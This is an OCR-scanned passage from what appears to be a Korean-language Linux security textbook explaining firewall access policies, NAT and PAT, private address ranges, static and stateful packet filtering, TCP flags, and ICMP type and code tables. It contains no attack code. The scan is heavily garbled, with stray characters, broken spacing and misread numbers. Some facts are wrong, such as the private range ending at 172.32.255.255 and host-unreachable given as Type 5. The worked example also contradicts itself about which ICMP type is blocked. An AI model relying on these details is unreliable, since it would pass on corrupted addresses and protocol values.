많은 기 관들은 일정 한 개 인이 특정의 활동을 하도록 하지 만 다른 사 
람에게는 이려한 형태의 접근을 원하지 않을수 있다 . 

시간 

일정한 시간동안 접근을 제한할수 있다 . 〈〈내부사용자는 인터네트 
웨브봉사기를 5 시부터 7 시사이에만 접근할수 있다.》라고 설정할 
수 있다 . 

공개 또는 비밀 

공공망을 리 용하여 (프레 임 중계 또는 인 터 네 트와 같은 ) 비 밀 자료를 전 
송하는것 이 유리할 때 도 있 다 . 접 근방책 은 정 보가 두 특정 호스트 또 
는 전체 망토막을 통과할 때 암호화되 여 야 한다는것 을 정 의 할수 있 다 . 

봉사의 질 

기관은 준비된 대역너비에 기초하여 접근을 제한하려 할수 있다 . 실 
례 로 인터네 트로부터 접 근될수 있는 하나의 웨 브봉사기 를 가지 고있 
으면서 이 체계에로의 접근은 항상 응답되여야 한다는것을 담보하 
려 할수 있다 . 잠재적인 의뢰기가 현재 웨브봉사기에 접근하고 있 
을 때 내 부사용자는 제한된 대 역너 비준위에 서 인 터네 트에 접근하여 
야 한다는 접 근조종원칙을 세울수 있다 . 의뢰 기 가 그 봉사기 에 접 
근하고 있을 때 내 부사용자들은 인 터 네 트자원을 접 근하기 위 하여 준 
비되여있는 대역너 비를 100% 다 가질수 있다 . 

역할 

개 별사용자에 게 접 근을 제 한하는것과 류사하게 관리 자는 류사한 접 
근요구를 가지 는 개 인들을 집 단으로 만들기 위 한 역 할을 리 용한다 . 이 
집 단화는 접근조종의 복잡성 을 간단하게 하며 관리부담을 쉽게 한다 . 


_ 約 
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앞으로 어떤 형식의 접근조종을 요구할것인가를 더 연구하여야 한다 . 어떤 기관들에 
서는 인터네트로부터의 자기들의 국부망에로의 접근에 대하여 관심을 돌리지 않고있다 . 그 
러나 앞으로는 외부의 의뢰자들이 인터네트에 기초한 원격접근을 요구하리라는것을 타산 
하여 야 한다 . 

一 주소변환기능 (NAT) 

주소변환은 방화벽의 중요한 기능의 하나이다 . 이 기능을 포함하지 않는 방화벽제품은 믿 
지 말아야 한다 . IP 주소가 한 값으로부터 다른 값으로 변환될 때 그것을 주소변환이 라고 한 

다 . 

이 특징은 대부분의 방화벽제품들에서 실현되였으며 대표적으로 원격체계로 하여금 내 
부체계의 진짜 IP 주소를 알지 못하게 하려고 할 때 리용된다 . 



된 원 IP =192,16 g + I ,50 
목적 [ P =20 a 3 121,73. & 
원천포구디 037 
목적포구=애 
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그림 3-6. 주소변환 


내 부작업기 는 외 부웨 브싸이트를 접 근하려 고 한다 . 그것 은 하나의 요청 을 만들어 그 정 
보를 자기 의 관문 (gateway) 에 보내 는데 이 경 우에 이 것 은 방화벽 이 다 . 국부 (local) 체 계 는 
하나의 작은 문제를 가지 고있는데 그것은 그것 이 위 치 하고있는 부분망이 사설주소배 당을 리 
용하는것 이 다 . 

사설주소는 인터네 트에서 리용하지 않는 주소공간이 다 . 이 것은 단순히 공인된 IP 주 
:어 있는 지 역 망이 다 . 사설망을 구성한 호스트들은 외 부의 어 떤 호스트들에 접 근 

鍾變邊 鍾變變©繼繼 
















게 3 광. LINUX 에째 땅보冬到 나련요소 


할수 있으며 제한적이긴 하지만 전자우편이나 ftp , news 등과 같은 봉사에도 접근이 가 
능하다. 

하지 만 외 부에 서 사설 망에 포함된 호스트에는 접 근할수 없 다. 

사설 주소배 당이 란 하나의 기 관이 자기 의 내 부호스트들을 주소를 배 당할 때 리 용할수 있 
는 IP 부분망대역 을 말한다. 이 대 역은 인터네트에서 경 로조종되도록 허 용하지 않고있기 
때 문에 리용가능하다. 이 것은 중돌한다는 걱정 이 없이 이 주소들을 쓸수 있다는것 을 의 미 
하지만 원격체계 에 보낸 어떤 요청 이 응답되 려면 어느 경로를 취해 야 하는가 하는것을 알 
수 없다. 

이 대역들은 다음과 같다. 

ᄄ 10.0.0.0 10.255.255.255 

ᄄ 172.16.0.0 172.32.255.255 

^ 192.168.0.0 192.168.255.255 

방화벽은 파케트머 리부를 조사하여 내부망으로 들어오는 응답들과 다른 체계 또는 방 
화벽 자체를 목적지로 하고 들어오는 자료흐름을 구별한다. 원천 IP 주소와 함께 방화벽은 
원천포구번호도 변화시킬수 있다. 이때 포구번호는 어느 응답이 어느 체계에로 가는가를 식 
별하는데 리용된다. 

원천포구는 전송체 계 에 의하여 동적 으로 배 당되 는 값이 다. 원천포구번호를 체 계 들사이 
에서 여 러 통신대화들을 구별하는데 리용하는것과 같은 방법으로 방화벽은 어느 응답이 내 
부체계들에 돌아와야 하는가 하는것을 기 억해두기 위하여 이 원천포구번호를 리용할수 있 

다. 

방화벽은 이러한 방법으로 IP 머리부정보를 변경시켜 그의 최종목적지에로 파케트를 전 
송한다. 돌아올 때 방화벽은 그 자료를 내부체계에 전송하기 위하여 IP 머리부를 다시 변경 
시켜 야 한다. 응답파케트에서 변화되여 야 하는것은 목적지 IP 주소와 봉사포구이 다. 왜 냐하면 
원격봉사기가 방화벽에 의하여 규정된 IP 주소와 원천포구에 응답하기때문이 다. 방화벽은 정 
보를 통과시 키 기 전에 이 값들을 말단에서 리 용된것 과 교체하여 야 한다. 

그러므로 말단은 원격봉사기에 도달할수 있으나 원격봉사기는 응답을 할수 없게 된다. 
이 것 으로 하여 주소변환이 필요하게 되 였 다. 우리 는 작업기 의 IP 주소를 어 떤 다른 합법 
적인 IP 주소로 넘길수 있다. 그림 3-6 에서 사설 IP 주소 192.168.1.50 을 방화벽의 외부 
대면부에서 리용되는 합법적인 주소인 199.53.72. 2로 변환하였다. 

주소변환을 전개하는데 세 가지 방법 이 있 다. 

매 개 방법 의 우점 과 제 한성 을 고찰해보자. 

① 숨은 NAT 

모든 내부호스트들은 하나의 IP 주소뒤 에 숨겨전다. 이것은 방화벽 그 자체 
일수 있고 어떤 다른 합법적인 번호일수도 있다. 숨은 NAT 는 리론적으로 수천 
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대화를 지원할수 있으므로 보충적인 지원을 요구한다면 여러개의 숨은 주소들이 리용될수 
있 다. 

숨은 NAT 의 가장 큰 제 한성은 그것 이 내부로의 대화를 만들지 못하게 한다는것 이 다. 
모든 체계는 하나의 주소뒤 에 숨어있으므로 방화벽은 원격대화요청 이 어느 내부체계를 목 
적지 로 할것 인가를 결정할수 없다. 내부호스트에 로의 통신이 존재하지 않기때 문에 모든 내 
부로의 대화요청은 차단된다. 


② 정적 NAT 

정적 NAT 는 숨은 NAT 와 류사하게 동작하는데 다른 점은 하나의 사설 IP 주소만이 매 
개 공적인 IP 주소에 대응된다는것이다. 이것은 사설 IP 주소들을 리용하는 하나의 내부체 
계를 가지 고있지 만 이 체계 가 인터네트로부터 접근가능하게 하려 고 할 때 유용하다. 하나 
의 내부호스트만이 매개 합법적인 IP 주소와 련관되므로 방화벽은 자료흐름을 어디로 전 
송할것 인가를 쉽게 결정할수 있다. 

실례 로 SMTP 기 능을 가진 하나의 내부교환봉사기 로 인터네 트에서 우편을 교환하려 
고 한다고 하자. 교환봉사기는 IP 주소 172. 25. 23. 13을 가지 고있는데 이것을 사설주소 
공간으로 볼수 있 다. 그러 므로 호스트는 인 터네 트에 위 치 한 호스트들과 통신할수 없 다. 

이 를 해 결 하기 위해 다음의 두가지 방법 을 선택할수 있 다. 

첫째로; 교환봉사기가 위치한 전체 부분망에 대하여 그 주소들을 사설주소로부터 합 
법적인 주소로 변화시킬수 있다. 

둘째 로 ; 방화벽 에 서 정 적 NAT 를 수행할수 있 다. 

두번째 방법 이 더 실 행 하기 쉽 다. 그것 은 내 부체 계 들로 하여 금 자기 에 게 배 당된 사설 
주소를 리 용하여 교환봉사기 와 계 속 통신할수 있게 하며 모든 인 터네 트통신들을 하나의 가 
상적인 합법적 IP 주소를 가지고 취급할수 있기때문이다. 

정적 NAT 는 또한 숨은 NAT 에서 차단하는 봉사들에 대해서도 유용하다. 실례로 DNS 
봉사기들사이의 어떤 통신은 원천 및 목적지포구가 다 포구 53에 설정될것을 요구한다. 
만일 숨은 NAT 를 리용한다면 방화벽 은 원천포구를 어 떤 우연적 인 웃포구번호로 바꿈 
으로써 통신대화를 차단하게 될 것 이 다. 정 적 NAT 를 리용하면 포구번호는 변화되 지 않 
아도 통신대화가 정상으로 진행될수 있다. 

※대부분의 NAT 장치들은 정적 및 숨은 NAT 를 동시에 리용할수 있게 한다. 


③ 포구주소변환 ( PAT ) 

포구주소변환은 대부분의 대 리자방화벽제품들에서 리용된다. PAT 가 리용될 때 밖으 
로의 모든 통신은 숨은 NAT 와 류사한 방법 으로 방화벽 에 의 하여 리용되 는 외 부 IP 주소로 변 
환된다. 숨은 NAT 와 달리 방화벽의 외부주소가 리용되여야 한다. 이것은 어떤 다른 합 
법적인 값으로 설정될수 없다. 

-로의 자료흐름을 취급하는 방법은 제품에 따라 다르다. 어떤 체계에서 포구들은 특 


(I 
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정 의 부분체 계 로 가정한다. 실례 로 방화벽 의 외부대 면부에 로 향하는 모든 SMTP 통신은(이 
것은 목적지 포구번호 25를 가진다.) 자동적 으로 득정의 내부체계 에 로 전송한다. 작은 환 
경에서 이 제한은 거의 문제로 되지 않는다. 많은 체계들이 같은 형태의 봉사기 (다중우편 
또는 FTP 봉사기와 같은)를 돌리고있는 큰 환경에서 이것은 큰 문제로 된다. 

이 문제를 극복하기 위하여 어떤 봉사기들은 여 러개의 내부봉사들을 지 원하기 위하여 
자료내 용을 분석 할수 있다. 실례 로 어떤 대 리 자는 user 8 eng . bofh . org ^- 주소지정된 모 
든 들어 오는 SMTP 우편들을 하나의 내부우편체계에로 전송하고 user 8 hr . bofh . org ^. 주 
소지정된 우편들은 다른 곳으로 전송한다. 

만일 같은 봉사를 돌리는 여 러개의 내부봉사기를 가지 고있다면 방화벽 이 그것들을 구 
별 할수 있는가를 확인해보아야 한다. 

一 파케트 및 내용 려과기능 

파케트려과에는 다음과 같은 종류가 있다. 


① 정적파케트려과 

정 적파케 트려과는 파케 트머 리부에 보관된 정 보를 리용하여 자료흐름을 조종한다. 파 
케트가 려과장치에서 수신될 때 파케트머 리부안에 저장된 자료의 속성들이 접근방책과 비 
교된다. (접근조종목록 또는 ACL 이 라고 부른다.) 이 머리부정보가 ACL 과 어떻게 비교되 
는가에 따라 그 자료흐름이 허용되든가 혹은 차단된다. 

정적파케트려과기는 자료흐름을 조종할 때 다음의 정보를 리용한다. 

^ 목적지 IP 주소 또는 부분망 
@ 원천 IP 주소 또는 부분망 
^목적지봉사포구 
^ 기발 (TCP 에서만) 

TCP 자료흐■의 파케트려과 

전송층에 서 TCP 가 리 용될 때 정 적파케 트려 과는 자료흐름조종결정 을 만들기 위하여 
TCP 머 리 부의 기 발마당을 리용할수 있 다. 기 발들은 설정 (2 진값 1) 되 거 나 또는 재 설정 (2 
진값 0) 된다. 

서로 다른 기발값들이 통신대화의 여러가지 상태를 식별하는데 리용된다는것을 알 
수 있다. 이 기발마당은 수신측 호스트에게 그 파케트가 나르고있는 자료에 대한 몇가지 
보충적인 정보를 준다. 

표 3-5 는 기 발들과 그 리용을 목록으로 보여주었다. 

기 발마당은 정적파케트려과에서 중요한 역 할을 한다. 그것은 방화벽 이 어떤 특정의 포 
구에서 나오거 나 또는 득정의 호스트에로 가는 모든 자료흐름들을 막는것은 아니기때문이 다. 

실례 로 다음과 같은 접 근방책을 설정하였다고 하자. 〈〈우리의 내부사용자들 
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트상의 임의의 봉사로 접근할수 있으나 내부망으로 향하는 모든 인터네트자료흐름은 막아 
야 한다.》이것은 ACL 이 인터네트로부터 들어오는 모든 자료흐름들을 막아야 한다는것 
처 럼 리해되지 만 사실상 그렇지 않다. 


표 3-5. 

TCP/IP 기발 

TCP 기 발 

기발의 내용 

ACK 

(Acknowledgement) 

이 자료가 한 자료요청에 대한 응답이라는것 그리고 응 
답번호마당에 유용한 정 보가 있 다는것 을 지 시한다. 

FIN (Final) 

송신체 계 가 현재 의 대 화를 끝내 려 고 한다는것 을 지 적 한다. 
보통 통신대 화의 매 체 계는 련결을 실제 적 으로 닫기 전에 하 
나의 FIN 을 전송한다. 

PSH(Push) 

전송체 계 가 전송하기 전에 자료들을 대 기하지 못하도록 한 
다. 수신즉에 서 Push 는 원격 체 계 가 그 자료를 대 기 하지 못 
하게 하지 만 웃층규약준위 에 로 가는 정 보는 즉시 밀 어 낸 다. 

RST (Reset) 

현재 통신대화의 상태 를 재 설정한다. Reset 는 회 복불가능 
한 전송오유가 발생할 때 리용된다. 이것은 전송층이 다 
음과 같이 말하는것과 같다. 〈〈당신은 내 말을 듣고있었 
는가? 내가 그것을 다시 말해야 하는가?》이것은 대체로 
응답없는 호스트에 의하여 발생한다. 

SYN (Synchronize) 

통신대화를 초기 화하는데 리 용된 다. 이 기 발은 통신과정 의 
어떤 다른 부분들에서는 설정되지 말아야 한다. 

URG (Urgent) 

전송체 계 가 높은 우선권을 가지 는 정 보를 가지 고있다는것， 
긴급지 시기 마당안에 유용한 정 보가 있 다는것 을 지 적한다. 
한 체계가 URG 기발이 설정된 파케트를 수신한다면 다른 
자료보다 먼저 그 정보를 처 리한다. 이것을 대 역외 자료 
처 리 라고 말한다. 


모든 통신은 두 단계과정을 통하여 표현된다. 어떤 사람이 웨브싸이트로 접근할 때 그 
는 하나의 자료요청 을 만들며 (첫단계 ) 웨 브싸이 트는 요청한 자료를 돌려 보냄 으로써 그에 
게 응답한다. (둘째단계) 이것은 둘째단계 가 진행되는동안 인터네트호스트로부터 내부체 
계 에로 자료가 오기를 기 다리고있다는것을 의미한다. 접근방책의 뒤부분을 그대로 받아들 
인다면 (《…내부망으로 향하는 모든 인터네트자료흐름은 막아야 한다.》) 응답들은 결코 
요청 한 호스트에 돌아오지 못할것 이 다. 이 것은〈〈 효과적 인 보안장치 가 아니 라 도선절 단기》 
나 같다. 즉 외부와의 모든 통신을 절단한것과 같다. 

이로부터 기발마당이 리용된다. TCP3 -파케 트련결신호동안에 시작하는 체계는 SYN=1 
이고 다른 모든 기발들은 0으로 설정한다. 이것은 한 체계가 다른 체계에 련결을 설정할 
때 하>것 이 다. 파케 트러 과기 는 TCP 대 화들을 조종하기 위 하여 이 일 의 적 인 기 발설 정 을 리 


錢變邊 鍾變變©繼繼 













게 3 광. LINUX 에째 땅보冬到 나련요소 


용한다. 초기련결요청을 막으면 두 체계사이의 자료대화는 설정될수 없다. 

그러므로 접근방책이 기술적으로 보다 정확한것으로 되도록 하기 위해서 다음과 같이 
설 정할수 있 다. 《 SYN=1 이 고 다른 모든 기 발들은 0 값을 가지 는 내 부망으로 향하는 모든 
인터 네 트자료흐름들은 막아야 한다.》이것은 명백 히 망주변을 잠그기 위 한 가장 안전한 방 
법 은 아니 다. 기 발값들을 리 용하여 공격 자는 정 적파케 트려 과기 를 속이고 나쁜 자료흐름을 
통과시키 게 할수 있 다. 이 방법 으로 공격 자는 이 보안장치 들을 한걸 음 앞지 를수 있 다. 


UDP 자료흐■의 파케트려과 

TCP 자료흐름은 조종하기가 그리 어렵지 않으나 UDP 자료흐름은 좀 어렵다. 그것은 
UDP 가 련결상태에 대하여 TCP 보다 적은 정보를 제공하기때문이다. 

UDP 머 리 부는 대 화의 상태 를 지 적 하기 위한 기 발들을 리 용하지 않는다는것 에 주목하 
여 야 한다. 이것은 파케트가 자료요청 인지 또는 이전의 요청 에 대 한 응답인지 결정하는 방 
법 이 없 다는것 을 의 미 한다. 즉 자료흐름을 결 정 하는 방법 이 없 다는것 을 의 미 한다. 자료흐 
름을 조절하는데 리용될수 있는 유일한 정보는 원천 및 목적지포구번호이다. 그런데 어떤 
봉사들은 같은 원천 및 목적지포구번호를 리용하기때문에 이 정보는 많은 경우에 적게 리 
용된 다. 

실례로 두 령역이름봉사기 (DNS) 가 정보를 교환하고있을 때 그들은 원천 및 목적지 
포구번호로 53 을 리용한다. 많은 다른 봉사들과 달리 그들은 1023 보다 큰 응답포구를 리 
용하지 않는다. 이 것은 정 적파케트려과기 가 DNS 자료흐름을 한 방향으로만 제 한하는 효 
과적인 방법 이 없 다는것 을 의 미한다. 그러 므로 포구 53 에 로 들어오는 자료흐름을 막을수 
없다. 그것은 자료응답과 함께 자료요청도 막기때문이 다. 

그런것 으로 하여 많은 경 우 정 적파케 트려 과기 에 의하여 UDP 자료흐름을 조절 하는 효 
과적 인 방법 은 그 포구를 막던지 또는 UDP 자료흐름을 통과시키 고 좋은 결과가 있기 를 바 
라는것뿐이다. UDP 자료흐름을 꼭 통과시켜야 할 필요가 없다면 대체로 해당한 포구를 
막는것이 합당하다. 


ICMP 흐■의 파케트려과 

인터네트조종통보문규약 (ICMP) 은 IP 규약에 대한 배경지원을 제공한다. 그것은 사용 
자자료를 나르는데 리용되지 않고 모든것 이 원만하게 돌아가고있다는것을 보증하기 위 한 관 
리 과제 를 위하여 리 용된다. 실례 로 Ping 은 ICMP 를 리용하여 두 호스트사이 에 련결 이 있 
다는것을 보증한다. 


ICMP 는 봉사포구를 리용하지 않는다. ICMP 파케트의 형식을 식별하기 위 한 형식 (Type) 
마당과 현재 의 대 화에 대 한 보다 상세한 정 보를 제 공하기 위한 코드 (Code) 마당이 있 다. 

표 3-6 은 ICMP 파케트에 대 한 여 러 가지 형식마당값들을 보여준다. 

UDP 는 기 발마당을 리용하지 않는다. 그러 므로 UDP 는 전송체 계 가 봉사가 준비 되 여 
있지 않다는것 을 알도록 하는데 쓸수 없 다. 이 문제 를 해 결 하기 위하여 ICMP 가 리용되 
여 전송체계에 알리게 된다. 
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표 3-6. ICMP Type 마당의 값들 


Type 

이 름 

설 명 

0 

Echo Reply 

echo 요청 에 응답 

3 

Destination 

unreachable 

목적지부분망，호스트 또는 봉사기에 도달할수 없다. 

4 

Source Quench 

수신체 계 또는 그 경 로에 따르는 경 로기 가 고장나서 들어오 
는 자료프름을 동과시 키지 못한다. 이것을 수신하는 체계는 
자기의 전송속도를 감소시켜야 한다. 이것은 수신체계가 과 
부하로 하여 자료를 잃어 버리지 않도륵 담보하기 위한것 이 
다. 

5 

Redirect 

국부호스트에 그 호스트가 전송하고있는 자료를 더 잘 전송 
할수 있는 또 하나의 경로기가 있음을 알린다. 이것은 국부 
경 로기 에 의하여 전송된 다. 

8 

Echo 

목표체계 가 Echo 응답을 보낼것을 요청한다. Echo 는 점대점 
련결을 확인하며 응답시 간을 측정하는데 리 용된다. 

9 

Router 

Advertisement 

경 로기 가 부분망에 서 자기 자신을 식 별 하기 위하여 사용한다. 
이것은 경로정보를 나르지 않으므로 경로조종규약은 아니다. 
이것은 그저 부분망우의 호스트가 그들의 국부경로기의 IP 
주소를 알도록 하는데 리용된다. 

10 

Router Selection 

호스트가 다음주기갱 신을 기 다리 지 않고 경 로기 에 질 문할수 
있게 한다. 

11 

Time Exceeded 

전송체계 에 파케트머 리부의 TTL 값이 초과되고 정보가 도달 
될수 없음을 알린다. 

12 

Paramater 

Problem 

ICMP 로 식별할수 없는 문제가 발생하였을 때 전송체계에 보 
내는 응답을 나타낸다. 

13 

Timestamp 

련결의 속도를 측정하려 할 때 리용된다. Echo 요청과 비슷 
하나 이 요청에 대한 빠른 응답이 결정적인것이다. 

14 

Timestamp Reply 

Timestamp 요청에 대한 응답이다. 

15 

Information 

Reguest 

Bootp 와 DHCP 에 의하여 교체 되 였 다. 이 요청 은 원래 IP 
주소를 발견하기 위하여 자체 구성 체 계 들에 서 리용되 였 다. 

16 

Information Reply 

Information Request 에 대 한 응답이 다. 

17 

Address Mask 
Reuest 

체계가 동적으로 국부망에 어떤 부분망이 리용될것인가를 묻 
도륵 한다. 만일 응답이 수신되지 않으면 호스트는 자기의 주 
소클라스에 적 당한 부분망마스크를 가정 하여 야 한다. 

18 

Address Mask 
Reply 

주소마스크요청 에 대 한 응답 

30 

广、: 

Traceroute 

한 IP 호스트로부터 다른것 에 로의 경 로를 추적하는 효과적 인 
수단을 제공한다. 이 선택은 모든 중개 경로기들이 이 ICMP 
형식을 인식하도록 프로그람화되였을 때에만 리용된다. 실 
현은 Ping 명 령 을 리용하는 교환기설정 을 통하여 진행 된다. 
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표 3-7 은 ICMP 형 식 이 목적 지 도달불가능 ( Type =3) 일 때 리용될 수 있 는 코드들을 보여 
주었다. 


표 3-7. ICMP Type 3 쿄드마당값들 


code 

Name 

설명 

0 

Net Unreachable 

경로조종오유(경로정보가 없는것과 같은)나 불충 
분한 TTL 값으로하여 목적지망에 도달할수 없다. 

1 

Host Unreachable 

경 로조종오유나 불충분한 TTL 값으로 하여 목적지 
호스트에 도달할수 없다. 

2 

Protocol Unreachable 

접 속한 목적 지호스트가 요구되 는 봉사를 제 공하지 
않는다. 이 코드는 대 표적으로 호스트로부터 귀환 
되며 다른것들은 모두 그 경로에 따르는 경로기로 
부터 귀환된다. 

4 

Fragmentation Needed and 
Don’t Fragment Was Set 

배 달하려는 자료가 보다 작은 파케트크기를 가지 
는 망을 통과하여야 하는데 《 don’t fragment } 
비트가 설정되여있다. 

5 

Source Route Failed 

전송된 파케 트에 는 그 경 로가 목적 지 호스트뒤 에 있 
어 야 한다고 지 적 되 여있는데 경 로정 보가 정 확하지 
않다. 


표 3-8 은 ICMP type 가 redirect ( Type =5) 일때 리용될수 있는 코드들을 보여주고있다. 


표 3-8. ICMP Type 5 쿄드마당값들 


code 

Name 

설명 

0 

Redirect Datagram for the 
Network (or Subnet ) 

국부망우의 또 하나의 경 로기 가 목적지 부분망 
에 로의 보다 좋은 경 로를 가지 고 있다는것을 지 
시한다. 

1 

Redirect Datagram for the 
Host 

국부망우의 또 하나의 경로기 가 목적지 호스트 
에로의 보다 좋은 경로를 가지고 있다는것을 지 
적 한다. 


Type 와 Code 마당의 값들에 기 초하여 려 과를 진행 하면 간단히 원천 및 목적 지 IP 주소 
들을 보는것 보다 좀 더 세 밀한 조종을 할수 있 다. 그러 나 모든 파케 트려 과기 가 다 모든 Type 
와 Code 들을 리용할수 있는것은 아니다. 실례로 많은 려과기들은 Code 값은 고려하지 않 
고 목적지도달불가능인 Type =3 을 려과해낸다. 이러한 제한은 엄중한 통신문제 점들을 초 
래할수 있다. 
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그림 3-7. 목적지도달불가능 틍보문들 막는 문제 

이제 그림 3-7 에 보여준것과 류사한 망구성 을 가지 고있다고 가정 하자. 그 국부망은 통 
표고리 형 위 상구조를 가지 고있고 원격 상대 는 이써네 트망을 가지 고있다. 자기 의 상대 에 게 최 
신의 제 품갱 신정 보와 개 발정 보를 받기 위하여 국부웨 브봉사기 에 접 근하려 고 한다. 

이 제 경 로기 가 들어오는 ICMP 목적 지 도달불가능통보문을 막고있 다고 가정 하자. 외 부 
공격자가 틀린 호스트도달불가능 (Type=5，Code=l) 통보문을 보내지 못하게 함으로써 봉 
사거 부공격 을 막기 위해 이 방법 을 선택하였 다. 경 로기 가 파케 트려 과능력 을 제 한하였 으므 
로 모든 ICMP Type=5 자료흐름을 막아야 한다. 

그러나 이것은 어떤 문제들을 생기게 할수 있다. 기업상대의 종업원들이 그 국부웨브 
봉사기에 접근하려고 할 때 그들은 그 어떤 HTML 폐지도 볼수 없게 될수 있다. 

이써네 트토막에 위 치 한 작업기 의 열 람기 는 목적지호스트이 름을 IP 주소로 변환하고 목 
적지 웨브봉사기에 련결한것처럼 보인다. 

만일 어 느한 경 로기 가 대 화가입등록을 제 공한다면 자료흐름은 두 체 계사이 에서 흐르 
는것 으로 나타난다. 또한 국부웨 브봉사기 우에 서 의 가입등록은 그 작업기 가 그 웨 브봉사기 
에 련결되고 많은 파일들이 제공되였다는것을 의미한다. 

그러면 무엇이 잘못되였는가? 공교롭게도 모든 Type=3 인 자료흐름들을 막음으로써 
Fragmentation Needed(Type=3, Code=4) 오유통보문도 막았다. 이것은 경로기로 하여 
는 자료흐름의 평균전송단위 (MTU) 를 조절하지 못하게 한다. 
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MTU 는 하나의 자료파케 트에 의 하여 전송될 수 있는 최 대유효자료크기 를 의 미한다. 이 
써네 트환경 에서 MTU 는 1.5 kb 이 다. 통표고리형 환경 에서 는 MTU 가 16 kb 만큼 클수 있 다. 
경로기가 목적지망에 대하여 너무 큰 파케트를 받으면 그는 전송체계에 요청을 보내여 그 
자료를 보다 작은 덩어리로 조갤것을 요구한다 (ICMP Type =3， Code =4). 경로기가 이 자 
료를 자체로 토막화하려고 하면 또 자기의 완중기억에 자리가 있는가 하는 문제가 제기된 
다. 그러므로 원격체계가 보다 작은 파케트를 전송하도록 하는것 이 더 쉽다. 

그래서 그림 3-7 에서의 자료흐름을 본다면 

1. 하나의 이써네 트작업기 가 HTML 자료요청 을 만든다. 

2. 이 요청 이 목적 지웨 브봉사기 에 로 전달된 다. 

3. 두 체 계는 64 byte 파케트를 리 용하여 TCP 3-파케 트련결신호를 수행한다. 

4. 일단 련결신호가 완성되면 웨브봉사기는 16 kBMTU 를 리용하여 자료요청에 응답한다. 

5. 이 응답은 원격 이써네 트망에 있는 경 로기 에 도착한다. 

6. 이써네트경로기는 토막화요청 (ICMP Type =3， Code =4) 을 웨브봉사기에 보내여 
1.5 klB MTU 를 사용할것 을 요구한다. 

7. 이 요청은 통표고리형망의 경계경 로기 에 로 돌아간다. 

8. 이 경 로기 는 자기 의 ACL 을 검 사하고 모든 목적지 도달불가능 통보문 ( ICMPType =3) 
을 중단하도록 하여 그 파케트를 취소한다. 

토막화요청 은 국부망에 로 돌아오지 않으며 원격 상대 는 목적하였 던 웨 브페 지 를 볼수 없 
다. 정 적파케 트려과를 리용할 때 항상 막거 나 허 용하고있는 자료흐름의 결과를 자기 가 완 
전히 리 해 하도록 하여 야 한다. 

정 적 파케 트러 과기 는 비 지 능적 인 려 과장치 이 다. 이 것 들은 발전된 공격 형 태 들은 거 의 막 
아 내지 못한다. 이것들은 어느 자료흐름이 허용되고 어느 자료흐름은 막아야 하는가를 결 
정 하는데 최 소량의 정 보만을 리용한다. 많은 경 로기 들은 정 적파케 트려 과를 수행하는 능력 
을 가지고있다. 


② 동적파케트려과 

동적 과케 트려과는 정 적파케트러 과보다 한걸음 전진한것 인데 통신대화의 상태 를 감시 하 
기 위한 련결표를 가지고있다. 그것은 그저 기발설정에만 의존하지 않는다. 이것은 자료흐 
름을 더 잘 조종하는데 리 용될수 있는 강력한 기 능으로 된다. 

실 례 로 한 공격 자가 어 떤 체 계 에 그것 의 기 능을 정 지 시 키 도륵 설 계 된 내 용을 가지 는 자 
료파케 트를 보낸 다고 하자. 공격 자는 이 파케 트가 내 부체 계 가 요청한 정 보에 대 한 응답으 
로 보이 도록 하기 위 하여 어 떤 속임 수를 쓸수 있 다. 보통의 파케 트려과기 는 이 파케 트를 분 
석하여 보고 ACK 비트가 설정된것을 알고는 이것이 자료요청에 대한 응답으로 보고 속히 
우게 된다. 그리고 그것을 내부체계에로 통과시킨다. \ 

그러 나 동적 파케트려과는 그렇게 쉽게 속지 않는다. 정보가 수신되면 동적 과^ 
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기는 자기의 련결표(상태표라고도 한다)를 참고한다. 표항목들을 조사하여보고 동적파케 
트러과기는 내부체계가 이 외부체계와 실제적으로 련결되여있지 않으며 자료요청을 보내 
지 않았다는것을 알게 된다. 이 정보는 명백히 요구되지 않았으므로 동적파케트려과기는 그 
과케트를 버리게 된다. 

동적 방화벽 장치 의 동작을 더 잘 리 해 하기 위 해 정적 방화벽 장치 와 동적 방화벽 장치 에 같 
은 파케트흐름을 통과시키고 동작과정을 고찰해보자. 

이제 이 두 방화벽장치들이 어떻게 자료흐름조종을 하는가를 알기 위하여 몇가지 접근 
방책들을 고찰하자. 두 방화벽 에서 ACL 은 다음과 같이 규정한다. 

첫째 로; 보호된 호스트는 원격봉사기 와 임의의 봉사대 화를 설정할수 있다. 

둘째로; 이미 설정된 임의의 대화는 통과를 허용한다. 

셋째로; 모든 다른 자료흐름은 정지된다. 

첫 번째 규칙 은 보호되 는 호스트가 원격봉사기 와의 련결 을 설 정하는것 을 허 용한다. 이 
것은 SYN 비트가 1인 파케트가 통과되도록 허용되는 유일한 경우는 원천주소가 보호되는 
호스트의것 이 고 목적 지 는 원격봉사기 인 경 우라는것 을 의 미한다. 바로 이 때 원격봉사기 에 
서의 임의의 봉사는 접근가능하다. 

두번째 규칙은 포괄적 인것 이다. 기본적으로 그것은 다음과 같이 규정하고있다. 《자 
료흐름이 이전에 설정된 련결의 부분으로 나타난다면 그것을 통과시키라.》다른 말로 하 
면 SYN 비트가 설정되지 않고 다른 모든 비트들이 0이라면 그 자료흐름은 통과시키라는 
것이다. 

세번째 규칙은 어떤 자료흐름이 첫 두개의 규칙들중 어 느것 에 득 맞지 않는다면 안전 
을 위하여 그것 을 버 리 라는것 이 다. 이 두 방화벽 은 다 좋은 ACL 을 리용한다. 그 차이 
는 자료흐름을 조종하기 위하여 매개에 준비되여있는 정보의 량에 있다. 어떤 자료흐름 
을 전송하고 무엇 이 발생하는가를 보기로 하자. 

내 부체 계 는 원격 봉사기 와의 하나의 통신대 화를 설정 하려 고 하고있 다. 모든 통과하는 자 
료흐름은 접 근조종목록에 설정된 기 준을 만족시키 므로 두 방화벽 들은 이 자료흐름들을 통 
과시 킨다. 

일단 련결신호가 완성되면 보호된 호스트는 하나의 자료요청을 만든다. 이 파케트는 
ACK 비트가 설정되여 있고 PSH 비트도 설정되여 있을수 있다. 원격봉사기가 이 요청을 받 
으면 그도 ACK 비트를 설정하고 가능한 PSH 비트도 설정하여 응답할것 이 다. 일단 자료전송 
이 끝나면 그 대화는 닫기고 매 체계는 FIN 비트를 설정한 하나의 파케트를 전송하게 된다. 
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Woolly 공격자 



원격봉사기 



그림 3-8. 두 호스트사이에서 확립된 대화 


그림 3-8 은 이 설정된 대화가 자료를 통과시키는것을 보여준다. 두번째 규칙 즉《이 
미 설정된 임의의 대화는 통과시킨다.》에 의하여 방화벽을 통과하는데서 문제가 없다. 그 
러나 매개 방화벽은 이 설정에서 약간의 차이를 가지고있다. 

정 적파케 트려 과기 는 기 발마당을 조사하여 SYN 비 트만이 1인가를 알려 고 한다. 그렇 
